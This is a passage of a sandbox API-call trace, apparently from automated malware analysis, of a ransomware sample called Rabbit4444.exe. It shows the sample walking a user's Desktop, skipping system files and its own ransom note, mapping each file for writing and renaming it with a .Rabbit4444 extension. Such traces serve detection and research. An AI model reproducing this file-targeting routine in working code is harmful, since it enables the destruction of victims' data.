RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0050.114] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.114] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0050.114] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.114] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0050.114] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14142485103) returned 1 [0050.114] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0050.114] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0050.114] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.115] CloseHandle (hObject=0x298) returned 1 [0050.115] CloseHandle (hObject=0x278) returned 1 [0050.115] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\qRlW8xjuiQwW5.bmp.Rabbit4444") returned 52 [0050.115] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\qRlW8xjuiQwW5.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\qrlw8xjuiqww5.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\qRlW8xjuiQwW5.bmp.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\desktop\\qrlw8xjuiqww5.bmp.rabbit4444"), dwFlags=0x1) returned 1 [0050.116] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc857f080, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xc857f080, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xc68e2d00, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x2ee00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Rabbit4444.exe", cAlternateFileName="RABBIT~1.EXE")) returned 1 [0050.116] lstrcmpiW (lpString1="Rabbit4444.exe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.116] lstrcmpiW (lpString1="Rabbit4444.exe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.116] lstrcmpiW (lpString1="Rabbit4444.exe", lpString2="Rabbit4444.exe") returned 0 [0050.116] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16ba5b60, ftCreationTime.dwHighDateTime=0x1d4d5d1, ftLastAccessTime.dwLowDateTime=0x2ee532d0, ftLastAccessTime.dwHighDateTime=0x1d4cf6b, ftLastWriteTime.dwLowDateTime=0x2ee532d0, ftLastWriteTime.dwHighDateTime=0x1d4cf6b, nFileSizeHigh=0x0, nFileSizeLow=0x9631, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rlF-zhRIKD7PdF8Xi0UD.m4a", cAlternateFileName="RLF-ZH~1.M4A")) returned 1 [0050.116] lstrcmpiW (lpString1="rlF-zhRIKD7PdF8Xi0UD.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.116] lstrcmpiW (lpString1="rlF-zhRIKD7PdF8Xi0UD.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.116] lstrcmpiW (lpString1="rlF-zhRIKD7PdF8Xi0UD.m4a", lpString2="Rabbit4444.exe") returned 1 [0050.116] lstrcmpiW (lpString1="rlF-zhRIKD7PdF8Xi0UD.m4a", lpString2=".") returned 1 [0050.116] lstrcmpiW (lpString1="rlF-zhRIKD7PdF8Xi0UD.m4a", lpString2="..") returned 1 [0050.116] lstrcmpiW (lpString1="rlF-zhRIKD7PdF8Xi0UD.m4a", lpString2="windows") returned -1 [0050.116] lstrcmpiW (lpString1="rlF-zhRIKD7PdF8Xi0UD.m4a", lpString2="bootmgr") returned 1 [0050.116] lstrcmpiW (lpString1="rlF-zhRIKD7PdF8Xi0UD.m4a", lpString2="pagefile.sys") returned 1 [0050.116] lstrcmpiW (lpString1="rlF-zhRIKD7PdF8Xi0UD.m4a", lpString2="boot") returned 1 [0050.116] lstrcmpiW (lpString1="rlF-zhRIKD7PdF8Xi0UD.m4a", lpString2="ids.txt") returned 1 [0050.116] lstrcmpiW (lpString1="rlF-zhRIKD7PdF8Xi0UD.m4a", lpString2="NTUSER.DAT") returned 1 [0050.116] lstrcpyW (in: lpString1=0x130eb68, lpString2="rlF-zhRIKD7PdF8Xi0UD.m4a" | out: lpString1="rlF-zhRIKD7PdF8Xi0UD.m4a") returned="rlF-zhRIKD7PdF8Xi0UD.m4a" [0050.116] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\rlF-zhRIKD7PdF8Xi0UD.m4a", dwFileAttributes=0x0) returned 1 [0050.116] lstrlenW (lpString="rlF-zhRIKD7PdF8Xi0UD.m4a") returned 24 [0050.116] lstrlenW (lpString="Rabbit4444") returned 10 [0050.116] lstrcmpiW (lpString1="8Xi0UD.m4a", lpString2="Rabbit4444") returned -1 [0050.116] lstrlenW (lpString=".dll") returned 4 [0050.116] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0050.116] lstrlenW (lpString=".lnk") returned 4 [0050.116] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0050.116] lstrlenW (lpString=".ini") returned 4 [0050.116] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0050.116] lstrlenW (lpString=".sys") returned 4 [0050.116] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0050.117] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\rlF-zhRIKD7PdF8Xi0UD.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\rlf-zhrikd7pdf8xi0ud.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.117] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.117] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14142744506) returned 1 [0050.117] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=38449) returned 1 [0050.117] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c20 [0050.117] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101f30 [0050.117] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x9940, lpName=0x0) returned 0x298 [0050.117] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9940) returned 0x70000 [0050.118] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.118] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0050.118] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.118] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0050.118] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.118] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0050.118] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.118] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0050.119] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14142927937) returned 1 [0050.119] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c20 | out: hHeap=0xe0000) returned 1 [0050.119] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101f30 | out: hHeap=0xe0000) returned 1 [0050.119] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.119] CloseHandle (hObject=0x298) returned 1 [0050.119] CloseHandle (hObject=0x278) returned 1 [0050.120] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\rlF-zhRIKD7PdF8Xi0UD.m4a.Rabbit4444") returned 59 [0050.120] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\rlF-zhRIKD7PdF8Xi0UD.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\rlf-zhrikd7pdf8xi0ud.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\rlF-zhRIKD7PdF8Xi0UD.m4a.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\desktop\\rlf-zhrikd7pdf8xi0ud.m4a.rabbit4444"), dwFlags=0x1) returned 1 [0050.120] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb659f020, ftCreationTime.dwHighDateTime=0x1d4ca57, ftLastAccessTime.dwLowDateTime=0x3a9096d0, ftLastAccessTime.dwHighDateTime=0x1d4d1e4, ftLastWriteTime.dwLowDateTime=0x3a9096d0, ftLastWriteTime.dwHighDateTime=0x1d4d1e4, nFileSizeHigh=0x0, nFileSizeLow=0x137d9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SIddsZ.ppt", cAlternateFileName="")) returned 1 [0050.120] lstrcmpiW (lpString1="SIddsZ.ppt", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.120] lstrcmpiW (lpString1="SIddsZ.ppt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.120] lstrcmpiW (lpString1="SIddsZ.ppt", lpString2="Rabbit4444.exe") returned 1 [0050.120] lstrcmpiW (lpString1="SIddsZ.ppt", lpString2=".") returned 1 [0050.120] lstrcmpiW (lpString1="SIddsZ.ppt", lpString2="..") returned 1 [0050.120] lstrcmpiW (lpString1="SIddsZ.ppt", lpString2="windows") returned -1 [0050.120] lstrcmpiW (lpString1="SIddsZ.ppt", lpString2="bootmgr") returned 1 [0050.120] lstrcmpiW (lpString1="SIddsZ.ppt", lpString2="pagefile.sys") returned 1 [0050.120] lstrcmpiW (lpString1="SIddsZ.ppt", lpString2="boot") returned 1 [0050.120] lstrcmpiW (lpString1="SIddsZ.ppt", lpString2="ids.txt") returned 1 [0050.120] lstrcmpiW (lpString1="SIddsZ.ppt", lpString2="NTUSER.DAT") returned 1 [0050.121] lstrcpyW (in: lpString1=0x130eb68, lpString2="SIddsZ.ppt" | out: lpString1="SIddsZ.ppt") returned="SIddsZ.ppt" [0050.121] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\SIddsZ.ppt", dwFileAttributes=0x0) returned 1 [0050.121] lstrlenW (lpString="SIddsZ.ppt") returned 10 [0050.121] lstrlenW (lpString="Rabbit4444") returned 10 [0050.121] lstrcmpiW (lpString1="SIddsZ.ppt", lpString2="Rabbit4444") returned 1 [0050.121] lstrlenW (lpString=".dll") returned 4 [0050.121] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0050.121] lstrlenW (lpString=".lnk") returned 4 [0050.121] lstrcmpiW (lpString1=".ppt", lpString2=".lnk") returned 1 [0050.121] lstrlenW (lpString=".ini") returned 4 [0050.121] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0050.121] lstrlenW (lpString=".sys") returned 4 [0050.121] lstrcmpiW (lpString1=".ppt", lpString2=".sys") returned -1 [0050.121] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\SIddsZ.ppt" (normalized: "c:\\users\\fd1hvy\\desktop\\siddsz.ppt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.121] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.121] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14143195648) returned 1 [0050.121] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=79833) returned 1 [0050.121] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0050.121] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101e20 [0050.121] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13ae0, lpName=0x0) returned 0x298 [0050.121] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13ae0) returned 0x70000 [0050.123] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.123] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0050.123] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.123] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0050.123] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.124] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0050.124] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.124] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0050.124] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14143457846) returned 1 [0050.124] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0050.124] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101e20 | out: hHeap=0xe0000) returned 1 [0050.124] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.125] CloseHandle (hObject=0x298) returned 1 [0050.125] CloseHandle (hObject=0x278) returned 1 [0050.126] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\SIddsZ.ppt.Rabbit4444") returned 45 [0050.126] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\SIddsZ.ppt" (normalized: "c:\\users\\fd1hvy\\desktop\\siddsz.ppt"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\SIddsZ.ppt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\desktop\\siddsz.ppt.rabbit4444"), dwFlags=0x1) returned 1 [0050.126] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4baedb50, ftCreationTime.dwHighDateTime=0x1d4d14b, ftLastAccessTime.dwLowDateTime=0x4503ded0, ftLastAccessTime.dwHighDateTime=0x1d4d282, ftLastWriteTime.dwLowDateTime=0x4503ded0, ftLastWriteTime.dwHighDateTime=0x1d4d282, nFileSizeHigh=0x0, nFileSizeLow=0x15760, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ssoUEo7W-0UrZF.mp3", cAlternateFileName="SSOUEO~1.MP3")) returned 1 [0050.126] lstrcmpiW (lpString1="ssoUEo7W-0UrZF.mp3", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.126] lstrcmpiW (lpString1="ssoUEo7W-0UrZF.mp3", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.126] lstrcmpiW (lpString1="ssoUEo7W-0UrZF.mp3", lpString2="Rabbit4444.exe") returned 1 [0050.126] lstrcmpiW (lpString1="ssoUEo7W-0UrZF.mp3", lpString2=".") returned 1 [0050.126] lstrcmpiW (lpString1="ssoUEo7W-0UrZF.mp3", lpString2="..") returned 1 [0050.126] lstrcmpiW (lpString1="ssoUEo7W-0UrZF.mp3", lpString2="windows") returned -1 [0050.126] lstrcmpiW (lpString1="ssoUEo7W-0UrZF.mp3", lpString2="bootmgr") returned 1 [0050.126] lstrcmpiW (lpString1="ssoUEo7W-0UrZF.mp3", lpString2="pagefile.sys") returned 1 [0050.126] lstrcmpiW (lpString1="ssoUEo7W-0UrZF.mp3", lpString2="boot") returned 1 [0050.126] lstrcmpiW (lpString1="ssoUEo7W-0UrZF.mp3", lpString2="ids.txt") returned 1 [0050.127] lstrcmpiW (lpString1="ssoUEo7W-0UrZF.mp3", lpString2="NTUSER.DAT") returned 1 [0050.127] lstrcpyW (in: lpString1=0x130eb68, lpString2="ssoUEo7W-0UrZF.mp3" | out: lpString1="ssoUEo7W-0UrZF.mp3") returned="ssoUEo7W-0UrZF.mp3" [0050.127] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ssoUEo7W-0UrZF.mp3", dwFileAttributes=0x0) returned 1 [0050.127] lstrlenW (lpString="ssoUEo7W-0UrZF.mp3") returned 18 [0050.127] lstrlenW (lpString="Rabbit4444") returned 10 [0050.127] lstrcmpiW (lpString1="-0UrZF.mp3", lpString2="Rabbit4444") returned -1 [0050.127] lstrlenW (lpString=".dll") returned 4 [0050.127] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0050.127] lstrlenW (lpString=".lnk") returned 4 [0050.127] lstrcmpiW (lpString1=".mp3", lpString2=".lnk") returned 1 [0050.127] lstrlenW (lpString=".ini") returned 4 [0050.127] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0050.127] lstrlenW (lpString=".sys") returned 4 [0050.127] lstrcmpiW (lpString1=".mp3", lpString2=".sys") returned -1 [0050.127] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ssoUEo7W-0UrZF.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\ssoueo7w-0urzf.mp3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.127] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.127] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14143795348) returned 1 [0050.127] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=87904) returned 1 [0050.127] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0050.127] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101408 [0050.127] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x15a60, lpName=0x0) returned 0x298 [0050.127] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x15a60) returned 0x70000 [0050.129] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.130] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0050.130] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.130] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0050.130] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.130] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0050.130] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.130] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0050.130] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14144069292) returned 1 [0050.130] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0050.130] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101408 | out: hHeap=0xe0000) returned 1 [0050.130] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.131] CloseHandle (hObject=0x298) returned 1 [0050.131] CloseHandle (hObject=0x278) returned 1 [0050.134] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\ssoUEo7W-0UrZF.mp3.Rabbit4444") returned 53 [0050.134] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\ssoUEo7W-0UrZF.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\ssoueo7w-0urzf.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\ssoUEo7W-0UrZF.mp3.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\desktop\\ssoueo7w-0urzf.mp3.rabbit4444"), dwFlags=0x1) returned 1 [0050.134] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3c604c0, ftCreationTime.dwHighDateTime=0x1d4cde6, ftLastAccessTime.dwLowDateTime=0x2d188760, ftLastAccessTime.dwHighDateTime=0x1d4c78f, ftLastWriteTime.dwLowDateTime=0x2d188760, ftLastWriteTime.dwHighDateTime=0x1d4c78f, nFileSizeHigh=0x0, nFileSizeLow=0x11adf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UdqNl Lu10Gn.xls", cAlternateFileName="UDQNLL~1.XLS")) returned 1 [0050.134] lstrcmpiW (lpString1="UdqNl Lu10Gn.xls", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.134] lstrcmpiW (lpString1="UdqNl Lu10Gn.xls", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.134] lstrcmpiW (lpString1="UdqNl Lu10Gn.xls", lpString2="Rabbit4444.exe") returned 1 [0050.135] lstrcmpiW (lpString1="UdqNl Lu10Gn.xls", lpString2=".") returned 1 [0050.135] lstrcmpiW (lpString1="UdqNl Lu10Gn.xls", lpString2="..") returned 1 [0050.135] lstrcmpiW (lpString1="UdqNl Lu10Gn.xls", lpString2="windows") returned -1 [0050.135] lstrcmpiW (lpString1="UdqNl Lu10Gn.xls", lpString2="bootmgr") returned 1 [0050.135] lstrcmpiW (lpString1="UdqNl Lu10Gn.xls", lpString2="pagefile.sys") returned 1 [0050.135] lstrcmpiW (lpString1="UdqNl Lu10Gn.xls", lpString2="boot") returned 1 [0050.135] lstrcmpiW (lpString1="UdqNl Lu10Gn.xls", lpString2="ids.txt") returned 1 [0050.135] lstrcmpiW (lpString1="UdqNl Lu10Gn.xls", lpString2="NTUSER.DAT") returned 1 [0050.135] lstrcpyW (in: lpString1=0x130eb68, lpString2="UdqNl Lu10Gn.xls" | out: lpString1="UdqNl Lu10Gn.xls") returned="UdqNl Lu10Gn.xls" [0050.135] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\UdqNl Lu10Gn.xls", dwFileAttributes=0x0) returned 1 [0050.135] lstrlenW (lpString="UdqNl Lu10Gn.xls") returned 16 [0050.135] lstrlenW (lpString="Rabbit4444") returned 10 [0050.135] lstrcmpiW (lpString1="Lu10Gn.xls", lpString2="Rabbit4444") returned -1 [0050.135] lstrlenW (lpString=".dll") returned 4 [0050.135] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0050.135] lstrlenW (lpString=".lnk") returned 4 [0050.135] lstrcmpiW (lpString1=".xls", lpString2=".lnk") returned 1 [0050.135] lstrlenW (lpString=".ini") returned 4 [0050.135] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0050.135] lstrlenW (lpString=".sys") returned 4 [0050.135] lstrcmpiW (lpString1=".xls", lpString2=".sys") returned 1 [0050.135] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\UdqNl Lu10Gn.xls" (normalized: "c:\\users\\fd1hvy\\desktop\\udqnl lu10gn.xls"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.135] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.135] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14144617844) returned 1 [0050.135] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=72415) returned 1 [0050.136] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0050.136] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0050.136] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x11de0, lpName=0x0) returned 0x298 [0050.136] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11de0) returned 0x70000 [0050.137] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.138] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0050.138] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.138] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0050.138] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.138] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0050.138] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.138] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0050.138] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14144869466) returned 1 [0050.138] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0050.138] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0050.138] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.139] CloseHandle (hObject=0x298) returned 1 [0050.139] CloseHandle (hObject=0x278) returned 1 [0050.139] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\UdqNl Lu10Gn.xls.Rabbit4444") returned 51 [0050.139] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\UdqNl Lu10Gn.xls" (normalized: "c:\\users\\fd1hvy\\desktop\\udqnl lu10gn.xls"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\UdqNl Lu10Gn.xls.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\desktop\\udqnl lu10gn.xls.rabbit4444"), dwFlags=0x1) returned 1 [0050.140] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4eaf54d0, ftCreationTime.dwHighDateTime=0x1d4ca1e, ftLastAccessTime.dwLowDateTime=0x19129930, ftLastAccessTime.dwHighDateTime=0x1d4cace, ftLastWriteTime.dwLowDateTime=0x19129930, ftLastWriteTime.dwHighDateTime=0x1d4cace, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UlU8B2wEqPRo", cAlternateFileName="ULU8B2~1")) returned 1 [0050.140] lstrcmpiW 